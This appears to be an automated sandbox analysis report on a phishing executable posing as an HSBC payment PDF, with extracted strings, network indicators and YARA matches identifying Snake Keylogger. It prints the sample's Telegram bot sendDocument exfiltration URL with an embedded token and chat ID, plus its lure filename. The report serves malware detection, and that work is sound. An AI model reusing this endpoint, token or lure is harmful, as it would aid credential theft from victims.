                  Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/7Ycs
                  Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/iwsxa
                  Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.000000000096D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/snsobwmcccpnrm
                  Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/
                  Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.htmlerror
                  Source: armsvc.exe, 00000002.00000003.2360231003.0000000002180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
                  Source: armsvc.exe, 00000002.00000003.2776062257.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                  Source: officesvcmgr.exe.2.drString found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
                  Source: armsvc.exe, 00000002.00000003.2400157057.0000000002180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                  Source: armsvc.exe, 00000002.00000003.2401146251.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2400933791.0000000002180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                  Source: armsvc.exe, 00000002.00000003.2776140964.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                  Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                  Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                  Source: armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                  Source: armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                  Source: armsvc.exe, 00000002.00000003.2775829627.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                  Source: officesvcmgr.exe.2.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
                  Source: officesvcmgr.exe.2.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175=4
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                  Source: officesvcmgr.exe.2.drBinary or memory string: RegisterRawInputDevicesmemstr_9cf0ccad-3

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.2083883140.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_88b2f3cc-f
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.2083883140.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f47998d3-f
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40cc756c-b
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d40cd6b-0
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: initial sampleStatic PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,15_2_006C8140
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\aed9f0dd1e9bf5c4.binJump to behavior
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00772ED07_2_00772ED0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_008C2ED011_2_008C2ED0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A82ED012_2_01A82ED0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00BA2ED014_2_00BA2ED0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C814015_2_006C8140
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006FF08015_2_006FF080
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006D0A1015_2_006D0A10
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C62E015_2_006C62E0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006D0B7015_2_006D0B70
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006CA35015_2_006CA350
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006FCB1015_2_006FCB10
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006F2D1015_2_006F2D10
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006FBD8015_2_006FBD80
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C7E7015_2_006C7E70
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_00702F3315_2_00702F33
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006F4F1015_2_006F4F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A904817_2_019A9048
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A434817_2_019A4348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AB57F17_2_019AB57F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A597817_2_019A5978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AF1E917_2_019AF1E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A432817_2_019A4328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AE4E117_2_019AE4E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AF77917_2_019AF779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AE93817_2_019AE938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019AED9517_2_019AED95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019A2DD117_2_019A2DD1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E456017_2_068E4560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E936017_2_068E9360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E004017_2_068E0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EC1C017_2_068EC1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E4BE117_2_068E4BE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E99B817_2_068E99B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EE6D117_2_068EE6D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EE6E017_2_068EE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E865817_2_068E8658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E865317_2_068E8653
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EA7A317_2_068EA7A3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EA7B017_2_068EA7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB4AB17_2_068EB4AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB4B817_2_068EB4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED58017_2_068ED580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E455F17_2_068E455F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED57417_2_068ED574
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EE28817_2_068EE288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E820017_2_068E8200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EE27917_2_068EE279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EF3D817_2_068EF3D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EF3E817_2_068EF3E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E434017_2_068E4340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E935317_2_068E9353
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E000617_2_068E0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED03817_2_068ED038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB05B17_2_068EB05B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB06017_2_068EB060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E81F017_2_068E81F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED12817_2_068ED128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E8EF817_2_068E8EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EDE2317_2_068EDE23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EDE3017_2_068EDE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EEF8717_2_068EEF87
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EEF9017_2_068EEF90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E8F0817_2_068E8F08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EAC0817_2_068EAC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E7DA817_2_068E7DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EBD5817_2_068EBD58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EBD6817_2_068EBD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E8AAB17_2_068E8AAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E8AB017_2_068E8AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E3BB817_2_068E3BB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EABFB17_2_068EABFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EEB2917_2_068EEB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EEB3817_2_068EEB38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EF83017_2_068EF830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EF84017_2_068EF840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E99A817_2_068E99A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED9C817_2_068ED9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068ED9D817_2_068ED9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB90317_2_068EB903
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068EB91017_2_068EB910
                  Source: C:\Windows\System32\Spectrum.exeCode function: 19_2_007E2ED019_2_007E2ED0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 21_2_00922ED021_2_00922ED0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                  Source: Acrobat.exe.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
                  Source: msedgewebview2.exe.2.drStatic PE information: Number of sections : 14 > 10
                  Source: msedge_proxy.exe0.2.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: pwahelper.exe0.2.drStatic PE information: Number of sections : 12 > 10
                  Source: identity_helper.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_proxy.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
                  Source: pwahelper.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: Number of sections : 11 > 10
                  Source: notification_click_helper.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
                  Source: setup.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086157727.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090821480.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111669308.0000000004140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
